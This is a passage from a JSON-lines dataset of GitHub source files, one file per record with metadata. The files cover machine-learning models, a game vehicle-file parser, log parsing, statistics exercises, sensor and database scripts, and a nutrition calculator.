Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output8 = self.prelu3_conv8(self.conv1d_layer8(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output9 = self.prelu3_conv9(self.conv1d_layer9(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n conv_output10 = self.prelu3_conv10(self.conv1d_layer10(out.transpose(1, 2))) # Conv연산의 결과 (B * num_conv_filter * max_seq_legth)\n\n out = conv_output1[:,:,9:] + conv_output2[:,:,8:] + conv_output3[:,:,7:] + conv_output4[:,:,6:] + conv_output5[:,:,5:] + conv_output6[:,:,4:] + conv_output7[:,:,3:] + conv_output8[:,:,2:] + conv_output9[:,:,1:] + conv_output10\n out = out.transpose(1, 2)\n out = out + user_embed[:,9:,:] + question_embed[:,9:,:]\n\n #out = self.drop_out(out)\n #out, _ = self.lstm(out)?\n\n out = self.drop_out(out)\n\n out = self.fc(out)\n preds = self.activation(out).view(batch_size, -1)\n\n return preds","repo_name":"bcaitech1/p4-dkt-team-ikyo","sub_path":"code/Deep Learning/QuestionUserAttention/dkt/my_model.py","file_name":"my_model.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"28108414557","text":"from keras import Sequential\nfrom keras import backend as K\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Conv2D, Activation, MaxPooling2D, Flatten, Dropout, Dense, ZeroPadding2D, GlobalAveragePooling2D\n\n\ndef model_setup():\n ###############################\n ##Zmiana modelu##\n ###############################\n\n shape = 294 # tutaj zmieniamy wymiary\n channels = 3 # a tutaj kanały\n\n model = Sequential()\n model.add(Conv2D(filters=32, kernel_size=(5, 5), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=128, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Conv2D(filters=256, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(Conv2D(filters=256, kernel_size=(3, 3), activation='relu', input_shape=(shape, shape, channels)))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n \n\n model.add(Flatten())\n model.add(Dense(440, activation='relu'))\n model.add(Dropout(0.3)) # dropout 1\n model.add(Dense(220, activation='relu'))\n model.add(Dense(110, activation='softmax'))\n model.add(Dropout(0.3)) # d\n model.add(Dense(110, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='Adam',\n metrics=[\n 'accuracy',\n 'mse',\n 'AUC']\n )\n \n\n return model\n\n","repo_name":"matchodura/Messier-Object-Identification","sub_path":"gui/model_creation.py","file_name":"model_creation.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5778116437","text":"from functools import partial\nimport parseFiles\nimport intMountsInfo\n\ndef createExecContext():\n contextToOverwrite = intMountsInfo.createExecContext()\n sfxStrings = parseFiles.parseStringsFromFile(\"sfx.strings.cs\")\n result = {\n \"vehicles\": [],\n \"H\": \"human\",\n \"C\": \"cybrid\",\n \"X\": \"xl\",\n \"x\": \"xl\",\n \"S\": \"small\",\n \"L\": \"large\",\n \"M\": \"medium\",\n \"T\": \"top\",\n \"B\": \"bottom\",\n \"L\": \"left\",\n \"R\": \"right\",\n \"I\": \"internal\",\n \"LeftPod\": \"leftPod\",\n \"Left_WingA\": \"leftWingA\",\n \"Right_WingA\": \"rightWingA\",\n \"tankLeftPod\": \"tankLeftPod\",\n \"tankRightPod\": \"tankRightPod\",\n \"TankLeftPod\": \"tankLeftPod\",\n \"TankRightPod\": \"tankRightPod\",\n \"Bumper\": \"bumper\",\n \"RightPod\": \"rightPod\",\n \"TopPod\": \"topPod\",\n \"TopPodA\": \"topPodA\",\n \"TopPodB\": \"topPodB\",\n \"LeftServos\": \"leftServos\",\n \"RightServos\": \"rightServos\",\n \"Pelvis\": \"pelvis\",\n \"none\": None,\n \"LeftWing1\": \"leftWing1\",\n \"RightWing1\": \"RightWing1\",\n \"LeftWing2\": \"leftWing2\",\n \"RightWing2\": \"RightWing2\",\n \"LeftEngine1\": \"leftEngine1\",\n \"RightEngine1\": \"rightEngine1\",\n \"LeftEngine2\": \"leftEngine2\",\n \"RightEngine2\": \"rightEngine2\",\n \"FlyerLeftFoot1\": \"flyerLeftFoot1\",\n \"FlyerLeftFoot2\": \"flyerLeftFoot2\",\n \"FlyerRightFoot1\": \"flyerRightFoot1\",\n \"FlyerRightFoot2\": \"flyerRightFoot2\",\n \"CargoA\": \"cargoA\",\n \"CargoB\": \"cargoB\",\n \"Tail\": \"tail\",\n \"LeftLeg\": \"leftLeg\",\n \"RightLeg\": \"rightLeg\",\n \"LeftLegA\": \"leftLegA\",\n \"RightLegA\": \"rightLegA\",\n \"LeftLegB\": \"leftLegB\",\n \"RightLegB\": \"rightLegB\",\n \"LeftLegC\": \"leftLegC\",\n \"RightLegC\": \"rightLegC\",\n \"LeftCalf\": \"leftCalf\",\n \"RightCalf\": \"rightCalf\",\n \"LeftFoot\": \"leftFoot\",\n \"RightFoot\": \"rightFoot\",\n \"LeftThigh\": \"leftThigh\",\n \"RighThigh\": \"rightThigh\",\n \"RightThigh\": \"rightThigh\",\n \"TankHead\": \"tankHead\",\n \"FlyerHead\": \"flyerHead\",\n \"Body\": \"body\",\n \"FlyerBody\": \"flyerBody\",\n \"LeftTread\": \"leftTread\",\n \"RightTread\": \"rightTread\",\n \"LeftTreadA\": \"leftTreadA\",\n \"RightTreadA\": \"rightTreadA\",\n \"LeftTreadB\": \"leftTreadB\",\n \"RightTreadB\": \"rightTreadB\",\n \"thermalDiffuser\": \"thermalDiffuser\",\n \"RearTread\": \"readTread\",\n \"CenterTread\": \"centerTread\",\n \"Pilot\": \"pilot\",\n \"Engine\": \"engine\",\n \"Armor\": \"armor\",\n \"Reactor\": \"reactor\",\n \"Head\": \"head\",\n \"Computer\": \"computer\",\n \"ElectroHull\": \"electroHull\",\n \"Shield\": \"shield\",\n \"Sensors\": \"sensor\",\n \"true\": True,\n \"false\": False,\n \"TRUE\": True,\n \"FALSE\": False,\n \"vehicleIsPilotable\": True,\n \"vehicleIsArtillery\": False,\n \"BASL\": \"BASL\",\n \"PROM\": \"PROM\",\n \"RBARTL\": \"RBARTL\",\n \"TRNIKE\": \"TRNIKE\",\n \"TRUPSR\": \"TRUPSR\"\n }\n\n result[\"hercBase\"] = partial(hercBase, contextToOverwrite)\n result[\"tankBase\"] = partial(hercBase, contextToOverwrite)\n result[\"flyerBase\"] = partial(hercBase, contextToOverwrite)\n result[\"droneBase\"] = partial(hercBase, contextToOverwrite)\n\n result[\"hercPos\"] = partial(hercPos, contextToOverwrite)\n result[\"tankPos\"] = partial(hercPos, contextToOverwrite)\n result[\"dronePos\"] = partial(hercPos, contextToOverwrite)\n result[\"flyerPos\"] = partial(flyerPos, contextToOverwrite)\n\n result[\"hercRot\"] = partial(hercRot, contextToOverwrite)\n result[\"tankRot\"] = partial(hercRot, contextToOverwrite)\n result[\"droneRot\"] = partial(hercRot, contextToOverwrite)\n result[\"flyerRot\"] = partial(flyerRot, contextToOverwrite)\n\n result[\"hercAnim\"] = partial(hercAnim, contextToOverwrite)\n result[\"tankAnim\"] = partial(tankAnim, contextToOverwrite)\n result[\"droneAnim\"] = partial(tankAnim, contextToOverwrite)\n result[\"hercAnim\"] = partial(hercAnim, contextToOverwrite)\n\n result[\"hercCpit\"] = partial(hercCpit, contextToOverwrite)\n result[\"tankCpit\"] = partial(hercCpit, contextToOverwrite)\n result[\"flyerCpit\"] = partial(hercCpit, contextToOverwrite)\n\n result[\"hercColl\"] = partial(hercColl, contextToOverwrite)\n result[\"droneColl\"] = partial(hercColl, contextToOverwrite)\n result[\"tankColl\"] = partial(hercColl, contextToOverwrite)\n result[\"flyerColl\"] = partial(hercColl, contextToOverwrite)\n\n result[\"hercAI\"] = partial(hercAI, contextToOverwrite)\n result[\"tankAI\"] = partial(hercAI, contextToOverwrite)\n result[\"flyerAI\"] = partial(hercAI, contextToOverwrite)\n\n result[\"flyerExhaust\"] = partial(flyerExhaust, contextToOverwrite)\n result[\"flyerExhaustOffset\"] = partial(flyerExhaustOffset, contextToOverwrite)\n result[\"flyerNav\"] = partial(flyerNav, contextToOverwrite)\n result[\"flyerSound\"] = partial(flyerSound, contextToOverwrite)\n\n result[\"tankSound\"] = partial(tankSound, contextToOverwrite)\n result[\"droneSound\"] = partial(tankSound, contextToOverwrite)\n result[\"tankSlide\"] = partial(tankSlide, contextToOverwrite)\n\n result[\"newHardPoint\"] = partial(newHardPoint, contextToOverwrite)\n result[\"newMountPoint\"] = partial(newMountPoint, contextToOverwrite)\n result[\"newComponent\"] = partial(newComponent, contextToOverwrite)\n result[\"newConfiguration\"] = partial(newConfiguration, contextToOverwrite)\n result[\"defaultWeapons\"] = partial(defaultWeapons, contextToOverwrite)\n result[\"defaultMountables\"] = partial(defaultMountables, contextToOverwrite)\n result[\"vehiclePilotable\"] = partial(vehiclePilotable, contextToOverwrite)\n result[\"vehicleArtillery\"] = partial(vehicleArtillery, contextToOverwrite)\n result[\"translucentCockpit\"] = partial(translucentCockpit, contextToOverwrite)\n result[\"hercFootprint\"] = partial(hercFootprint, contextToOverwrite)\n result[\"HardPointDamage\"] = partial(HardPointDamage, contextToOverwrite)\n result[\"HardPointSpecial\"] = partial(HardPointSpecial, contextToOverwrite)\n result[\"hardPointSpecial\"] = partial(HardPointSpecial, contextToOverwrite)\n result[\"droneExplosion\"] = partial(droneExplosion, contextToOverwrite)\n result[\"genericDrone\"] = partial(genericDrone, contextToOverwrite)\n\n for key in sfxStrings:\n contextToOverwrite[key] = sfxStrings[key]\n\n for key in result:\n contextToOverwrite[key] = result[key]\n\n return contextToOverwrite\n\ndef vehiclePilotable(context, value):\n context[\"vehicleIsPilotable\"] = value\n\ndef vehicleArtillery(context, value):\n context[\"vehicleIsArtillery\"] = value\n\ndef hercBase(context, identityTag, abbreviation, shape, mass, maxMass, radarCrossSection, techLevel, combatValue):\n herc = {\n \"vehiclePilotable\": context[\"vehicleIsPilotable\"],\n \"vehicleArtillery\": context[\"vehicleIsArtillery\"],\n \"identityTag\": identityTag,\n \"abbreviation\": abbreviation,\n \"shape\": shape,\n \"mass\": mass,\n \"maxMass\": maxMass,\n \"radarCrossSection\": radarCrossSection,\n \"techLevel\": techLevel,\n \"combatValue\": combatValue,\n \"hardPoints\": [],\n \"mountPoints\": [],\n \"components\": [],\n \"configurations\": [],\n \"defaultWeapons\": [],\n \"defaultMountables\": [],\n \"pos\": None,\n \"rot\": None,\n \"anim\": None,\n \"cpit\": None,\n \"coll\": None,\n \"ai\": None,\n \"sound\": None,\n \"exhaust\": None,\n \"slide\": None,\n \"footprintType\": None\n }\n context[\"vehicleIsPilotable\"] = True\n context[\"vehicleIsArtillery\"] = False\n context[\"currentVehicle\"].update(herc)\n\n\ndef hercPos(context, maxPosAcc, minPosVel, maxForPosVel, maxRevPosVel):\n context[\"currentVehicle\"][\"pos\"] = {\n \"maxPosAcc\": maxPosAcc,\n \"minPosVel\": minPosVel,\n \"maxForPosVel\": maxForPosVel,\n \"maxRevPosVel\": maxRevPosVel\n }\n\ndef flyerPos(context, maxPosAcc, thrustMultiple, maxLiftVel, maxFallVel, maxFlyVel, fastLean):\n context[\"currentVehicle\"][\"pos\"] = {\n \"maxPosAcc\": maxPosAcc,\n \"thrustMultiple\": thrustMultiple,\n \"maxLiftVel\": maxLiftVel,\n \"maxFallVel\": maxFallVel,\n \"maxFlyVel\": maxFlyVel,\n \"fastLean\": fastLean\n }\n\ndef hercRot(context,minRotVel, maxRVSlow, maxRVFast, maxRVTurret = None):\n context[\"currentVehicle\"][\"rot\"] = {\n \"minRotVel\": minRotVel,\n \"maxRVSlow\": maxRVSlow,\n \"maxRVFast\": maxRVFast,\n \"maxRVTurret\": maxRVTurret\n }\n\ndef flyerRot(context, maxRotXVel, maxRotYVel, maxRotZVel):\n context[\"currentVehicle\"][\"rot\"] = {\n \"maxRotXVel\": maxRotXVel,\n \"maxRotYVel\": maxRotYVel,\n \"maxRotZVel\": maxRotZVel,\n }\n\ndef hercAnim(context, toStandVel, toRunVel, toFastRunVel, toFastTurnVel):\n context[\"currentVehicle\"][\"anim\"] = {\n \"toStandVel\": toStandVel,\n \"toRunVel\": toRunVel,\n \"toFastRunVel\": toFastRunVel,\n \"toFastTurnVel\": toFastTurnVel\n }\n\ndef tankAnim(context, treadAnimRotCoefficient, treadAnimPosCooefficent):\n context[\"currentVehicle\"][\"anim\"] = {\n \"treadAnimRotCoefficient\": treadAnimRotCoefficient,\n \"treadAnimPosCooefficent\": treadAnimPosCooefficent\n }\n\ndef hercCpit(context, offsetX, offsetY, offsetZ):\n context[\"currentVehicle\"][\"cpit\"] = {\n \"offsetX\": offsetX,\n \"offsetY\": offsetY,\n \"offsetZ\": offsetZ\n }\n\ndef hercColl(context, sphOffstX, sphOffstY, sphOffstZ, sphereRad):\n context[\"currentVehicle\"][\"coll\"] = {\n \"sphOffstX\": sphOffstX,\n \"sphOffstY\": sphOffstY,\n \"sphOffstZ\": sphOffstZ,\n \"sphereRad\": sphereRad\n }\n\ndef hercAI(context, aiName1 = None, aiName2 = None, aiName3 = None, aiName4 = None):\n context[\"currentVehicle\"][\"ai\"] = {\n \"aiName1\": aiName1,\n \"aiName2\": aiName2,\n \"aiName3\": aiName3,\n \"aiName4\": aiName4\n }\n\ndef hercFootprint(context, footprintType):\n context[\"currentVehicle\"][\"footprintType\"] = footprintType\n\ndef tankSound(context, engineSoundTag, hasThrusters):\n context[\"currentVehicle\"][\"sound\"] = {\n \"engineSoundTag\": engineSoundTag,\n \"hasThrusters\": hasThrusters\n }\n\ndef flyerSound(context, startupTag, shutdownTag, flyTag, damagedFlyTag):\n context[\"currentVehicle\"][\"sound\"] = {\n \"startupTag\": startupTag,\n \"shutdownTag\": shutdownTag,\n \"flyTag\": flyTag,\n \"damagedFlyTag\": damagedFlyTag\n }\n\ndef tankSlide(context, slideCoefficient):\n context[\"currentVehicle\"][\"slide\"] = {\n \"slideCoefficient\": slideCoefficient\n }\n\ndef flyerExhaust(context, exhaustShapeT, exhaustShapeNT, numberOfSources):\n context[\"currentVehicle\"][\"exhaust\"] = {\n \"exhaustShapeT\": exhaustShapeT,\n \"exhaustShapeNT\": exhaustShapeNT,\n \"numberOfSources\": numberOfSources,\n \"offsets\": []\n }\n\ndef flyerExhaustOffset(context, *values):\n context[\"currentVehicle\"][\"exhaust\"][\"offsets\"].append(values)\n\ndef flyerNav(context, maxLean, maxBank, taxiRange, shortRange, mediumRange):\n context[\"currentVehicle\"][\"nav\"] = {\n \"maxLean\": maxLean,\n \"maxBank\": maxBank,\n \"taxiRange\": taxiRange,\n \"shortRange\": shortRange,\n \"mediumRange\": mediumRange\n }\n\ndef droneExplosion(context, *values):\n context[\"currentVehicle\"][\"droneExplosion\"] = values\n\ndef translucentCockpit(context):\n context[\"currentVehicle\"][\"cpit\"][\"translucent\"] = True\n\ndef newHardPoint(context, hardpointId, size, side, dmgParent, offsetFromNodeX, offsetFromNodeY, offsetFromNodeZ, xRotationRangeMin, xRotationRangeMax, zRotationRangeMin, zRotationRangeMax):\n context[\"currentVehicle\"][\"hardPoints\"].append({\n \"hardpointId\": hardpointId,\n \"size\": size,\n \"side\": side,\n \"dmgParent\": dmgParent,\n \"offsetFromNode\": [offsetFromNodeX, offsetFromNodeY, offsetFromNodeZ],\n \"xRotationRange\": [xRotationRangeMin, xRotationRangeMax],\n \"zRotationRange\": [zRotationRangeMin, zRotationRangeMax]\n })\n\ndef HardPointDamage(context, damageValue):\n context[\"currentVehicle\"][\"hardPoints\"][-1][\"damage\"] = damageValue\n\ndef HardPointSpecial(context, specialValue):\n context[\"currentVehicle\"][\"hardPoints\"][-1][\"special\"] = specialValue\n\ndef newMountPoint(context, mountPointId, size, dmgParent, *allowedMountables):\n mountPoint = {\n \"mountPointId\": mountPointId,\n \"size\": size,\n \"dmgParent\": dmgParent,\n \"allowedMountables\": []\n }\n\n for mountable in allowedMountables:\n mountPoint[\"allowedMountables\"].append(mountable)\n context[\"currentVehicle\"][\"mountPoints\"].append(mountPoint)\n\n\ndef newComponent(context, componentId, componentType, parent, maxDamage, identityTag):\n context[\"currentVehicle\"][\"components\"].append({\n \"componentId\": componentId,\n \"componentType\": componentType,\n \"parent\": parent,\n \"maxDamage\": maxDamage,\n \"identityTag\": identityTag\n })\n\ndef newConfiguration(context, containee, containter, internalPercentage):\n context[\"currentVehicle\"][\"configurations\"].append({\n \"containee\": containee,\n \"container\": containter,\n \"internalPercentage\": internalPercentage\n })\n\ndef defaultWeapons(context, *weapons):\n for weapon in weapons:\n context[\"currentVehicle\"][\"defaultWeapons\"].append(weapon)\n\ndef defaultMountables(context, *mountables):\n for mountable in mountables:\n context[\"currentVehicle\"][\"defaultMountables\"].append(mountable)\n\ndef genericDrone(context, cargoCount):\n context[\"currentVehicle\"][\"cargoCount\"] = cargoCount\n globalStrings = parseFiles.parseStringsFromFile(\"Sim.Strings.cs\")\n\n # manually parsing the file for now, because we know the structure\n # of datDroneGeneric and we don't need any other script files to make all this work.\n with open(\"datDroneGeneric.cs\", \"r\") as genericFile:\n lines = genericFile.read().splitlines()\n currentBlock = \"\"\n for index, line in enumerate(lines):\n if currentBlock == \"if\":\n currentBlock = \"\"\n continue\n line = line.strip()\n line = currentBlock + line\n\n if line.startswith(\"{\") or line.startswith(\"}\"):\n line = line.replace(\"{\", \"\").replace(\"}\", \"\")\n\n if line.startswith(\"function\") or line == \"\":\n continue\n\n if \"%cargoCount\" in line:\n line = line.replace(\"%cargoCount\", str(cargoCount))\n if line.startswith(\"if\"):\n line = line + \":\"\n nextLine = \"\\t\" + lines[index + 1].replace(\"{\", \"\").replace(\"}\", \"\").strip()\n line = \"\\n\".join([line, nextLine])\n currentBlock = \"if\"\n exec(line, globalStrings, context)","repo_name":"open-siege/open-siege","sub_path":"3space/tools/legacy/veh-parser/vehicleInfo.py","file_name":"vehicleInfo.py","file_ext":"py","file_size_in_byte":14895,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"21913468120","text":"import os\nfrom abipy.flowtk import PseudoTable\n\n_root = os.path.dirname(__file__)\n_paths = [f for f in os.listdir(_root) if f.endswith(\"hgh\")]\n# Need one pseudo for element\nd = {}\nfor p in _paths:\n i = p.index(\".\")\n head, tail = p[:i], p[i:]\n d[head] = tail\n\n_paths = [k + v for k, v in d.items()]\n_paths = [os.path.join(_root, f) for f in _paths]\ndel d\n\nHGH_TABLE = PseudoTable(_paths)\n\n# Add fake hints.\nfor pseudo in HGH_TABLE:\n pseudo.dojo_report = {}\n pseudo.dojo_report[\"hints\"] = {}\n for accuracy in [\"low\", \"normal\", \"high\"]:\n pseudo.dojo_report[\"hints\"][accuracy] = {\"ecut\": 50}\n #assert pseudo.has_hints\n","repo_name":"abinit/abipy","sub_path":"abipy/data/hgh_pseudos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"72"} +{"seq_id":"33546639516","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport json\nfrom re import match\n\nPATTERN = r'(?P[\\d+/ :]+) \\[(?P.+)\\] .*?: (?P.+), client: (?P.+), server: (?P.+), request: (?P.+), host: (?P.+)'\n\n\ndef convert_nginx_log_to_dict():\n \"\"\"Read from command line using pipe(|) and convert nginx log to json file\n\n Returns:\n list -- nginx log json\n \"\"\"\n nginx_logs = list()\n lines = sys.stdin.readlines()\n if not lines:\n return nginx_logs\n\n for line in lines:\n pattern = match(PATTERN, line)\n log = pattern.groupdict()\n nginx_logs.append(log)\n\n return nginx_logs\n","repo_name":"dohyungp/code-snippets","sub_path":"python-snippets/nginx_log_parser.py","file_name":"nginx_log_parser.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35770688388","text":"import numpy as np\nimport scipy.stats as stats\n\n# Исследовалось влияние препарата на уровень давления пациентов. Сначала\n# измерялось давление до приема препарата, потом через 10 минут и через 30 минут. Есть\n# ли статистически значимые различия между измерениями давления? В выборках не соблюдается условие нормальности.\n# 1е измерение до приема препарата: 150, 160, 165, 145, 155\n# 2е измерение через 10 минут: 140, 155, 150, 130, 135\n# 3е измерение через 30 минут: 130, 130, 120, 130, 125\n\nalpha = 0.05\nx1 = np.array([150, 160, 165, 145, 155])\nx2 = np.array([140, 155, 150, 130, 135])\nx3 = np.array([130, 130, 120, 130, 125])\n\nstat = stats.friedmanchisquare(x1, x2, x3)\nprint(stat)\nprint('pvalue < alpha, H0 - отвергается, cтатистически значимые различия присутствуют!'\n '\\nПрепарат работает!')\n","repo_name":"ravenlexa/Home_work","sub_path":"Seminar_7/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19578478267","text":"import time\nimport pandas as pd\nfrom LSGW.RequestsSensorsLight import *\nfrom config.config import *\nfrom datetime import datetime\n\nnow = datetime.now()\n\ncurrent_time = now.strftime(\"%d_%m_%Y_%H_%M_%S\")\narr = []\nfor cct_value in range (2700,6700,400):\n str(cct(cct_value))\n print(cct_value)\n for dim_value in range(0,110,10):\n str(dim(dim_value))\n print(dim_value)\n time.sleep(timeValue)\n getSensorLight()\n arr.append((cct_value,dim_value,getSensorLight()))\n print(arr)\n csv = pd.DataFrame(arr).to_csv(sensorsName+'_report_' + current_time + '.csv')\n\n","repo_name":"valeriia7/Gateway-API-EU","sub_path":"LSGW/SensorControl.py","file_name":"SensorControl.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24982642541","text":"import os\nimport shutil\nimport uuid\n\nfrom app.support.support import setup_app\n\nTEST_DATA_FILE_PATH = './tests/data/users.csv'\nTMP_FILE_PATH = './tmp'\n\n\ndef setup_app_for_test(app):\n assert os.path.exists(TEST_DATA_FILE_PATH)\n\n if not os.path.exists(TMP_FILE_PATH):\n os.mkdir(TMP_FILE_PATH)\n\n test_data_file_name = str(uuid.uuid4())\n\n test_file_name = os.path.join(TMP_FILE_PATH, test_data_file_name)\n shutil.copy(TEST_DATA_FILE_PATH, test_file_name)\n\n setup_app(app, test_file_name)\n","repo_name":"ei-roslyakov/flask_rest_api_csv","sub_path":"tests/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2033851725","text":"numeros = []\ntotal = 0\nnumero = 0\ncontador = 0\n\nwhile numero < 6:\n valor = input()\n numeros.append(valor)\n numero += 1\n\n\nfor num in numeros:\n if float(num) > 0:\n contador += 1\n total += float(num)\n\nmedia = total / contador\n\nprint(\"{} valores positivos\".format(contador))\nprint(\"{:.1f}\".format(media))","repo_name":"viniielopes/uri","sub_path":"iniciante/1064.py","file_name":"1064.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5641365086","text":"print(\"=============================\")\nprint(\"====Calculadora de Macros====\")\nprint(\"=============================\")\n# Recebendo características físicas e frequência de treino do usuário:\n# Estrutura física:\naltura = int(input(\"Digite a sua altura (cm): \"))\npeso = int(input(\"Digite o seu peso (kg): \"))\nidade = int(input(\"Digite a sua idade (anos): \"))\nsexo = int(input('''Digite o seu sexo:\n[1] Masculino\n[2] Feminino '''))\n# Atividade cotidiana:\natv_cotidiana = int(input('''Como vc é fora da academia?\n[1] Sedentário (maior parte do dia sentado/ trabalho em escritório)\n[2] Moderadamente ativo (maior parte do dia caminhando ou fazendo alguma atividade)\n[3] Bastante ativo (trabalho braçal/ faz entregas pedalando) '''))\n# Sobre Musculação:\nfreq_musculação = int(\n input(\"Digite o N° de vezes que vc faz musculação na semana: \"))\ntempo_musculação = int(input(\n \"Quanto tempo dura, em média, o seu treino de musculação (tempo em minutos)? \"))\nintensidade_musculação = int(input('''Com que intensidade vc treina musculação?\n[1] Treino pouco intenso\n[2] Treino intenso\n[3] Treino como um bodybuilder porra!!! '''))\n# Sobre Aeróbico:\nfreq_aeróbico = int(\n input(\"Digite o N° de vezes que vc faz aeróbico na semana: \"))\ntempo_aeróbico = int(input(\n \"Quanto tempo dura, em média, o seu treino de aeróbico (tempo em minutos)? \"))\nintensidade_aeróbico = int(input('''Com que intensidade vc treina aeróbico?\n[1] Aeróbico pouco intenso\n[2] Aeróbico intenso\n[3] Aeróbico muito intenso '''))\n# Objetivo:\nobjetivo = int(input('''Qual é o seu ojetivo?\n[1] Hipertrofia\n[2] Perder peso '''))\n# ----------------------------------------------------------------------------------\n# Calculando a Taxa Metabólica Basal (TMB):\n# P/ Homens:\nif(sexo == 1):\n taxa_met_basal = 66.5 + (13.75 * peso) + (5.0 * altura) - (6.8 * idade)\n print(\"Sua taxa metabólica basal é {:.2f} kcal\".format(taxa_met_basal))\n# P/ Mulheres:\nelse:\n taxa_met_basal = 665.0 + (9.60 * peso) + (1.8 * altura) - (4.7 * idade)\n print(\"Sua taxa metabólica basal é {:.2f} kcal\".format(taxa_met_basal))\n# ----------------------------------------------------------------------------------\n# Calculando o Gasto Energético com Atividade Física:\n# P/ Musculação:\nif(intensidade_musculação == 1):\n met_musculação = 4.0\nelif(intensidade_musculação == 2):\n met_musculação = 4.5\nelif(intensidade_musculação == 3):\n met_musculação = 6.0\ngasto_musculação = met_musculação * peso * tempo_musculação/60\n# P/ Aeróbico:\nif(intensidade_aeróbico == 1):\n met_aeróbico = 5.0\nelif(intensidade_aeróbico == 2):\n met_aeróbico = 6.5\nelif(intensidade_aeróbico == 3):\n met_aeróbico = 7.0\ngasto_aeróbico = met_aeróbico * peso * tempo_aeróbico/60\n# Gasto energético cotidiano (fora da academia):\nif(atv_cotidiana == 1):\n gasto_cotidiano = 200\nelif(atv_cotidiana == 2):\n gasto_cotidiano = 300\nelif(atv_cotidiana == 3):\n gasto_cotidiano = 400\n# Gasto energético com a atividade física:\ngasto_atv_física = gasto_musculação + gasto_aeróbico + gasto_cotidiano\n# ----------------------------------------------------------------------------------\n# Calculando o Gasto Energético Total Diário:\ngasto_total = taxa_met_basal + gasto_atv_física\nprint(\"O seu gasto calórico diário é {} kcal\".format(gasto_total))\n","repo_name":"williamSouza21/exercicios-em-python","sub_path":"Calculadora_de_macros.py","file_name":"Calculadora_de_macros.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20377228127","text":"import csv\nimport psycopg2\nimport traceback\n\ndef get_location_distances():\n distancias = None\n try:\n conn = psycopg2.connect(database='assistcargo', user='*', password='*', host='localhost')\n cur = conn.cursor()\n\n cur.execute(\"SELECT ubicacion_id_origen, ubicacion_id_destino, tiempo FROM distancias;\")\n distancias = cur.fetchall()\n except Exception:\n traceback.print_exc()\n\n if distancias:\n distancias_list = []\n for orig, dest, time in distancias:\n distancias_list.append({\n 'ORIGEN': orig,\n 'DESTINO': dest,\n 'DISTANCIA': int(time) if time != 0 else -1\n })\n distancias_list.append({\n 'ORIGEN': dest,\n 'DESTINO': orig,\n 'DISTANCIA': int(time) if time != 0 else -1\n })\n return distancias_list\n else:\n return []\n\n\nif __name__ == '__main__':\n distances = get_location_distances()\n\n keys = distances[0].keys()\n with open('./csvs/distances.csv', 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(distances)\n","repo_name":"danilosim/optimizacion-data-logis","sub_path":"distances_csv.py","file_name":"distances_csv.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10564110641","text":"import uuid\n\nfrom datetime import datetime\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.functional import cached_property\nfrom django.utils.safestring import mark_safe\n\nfrom wagtail.blocks.field_block import (BooleanBlock, CharBlock, ChoiceBlock, PageChooserBlock,\n RawHTMLBlock, RichTextBlock as _RichTextBlock, URLBlock, IntegerBlock, Block)\nfrom wagtail.blocks.list_block import ListBlock\nfrom wagtail.blocks.stream_block import StreamBlock\nfrom wagtail.blocks.struct_block import StructBlock\nfrom wagtail.blocks import StructValue\nfrom wagtail.embeds.blocks import EmbedBlock as _EmbedBlock\nfrom wagtail.images.blocks import ImageChooserBlock as _ImageChooserBlock\nfrom wagtail.documents.blocks import DocumentChooserBlock\nfrom wagtail.snippets.blocks import SnippetChooserBlock\n\nfrom bakeup.shop.models import ProductionDay, Product\n\n\nclass 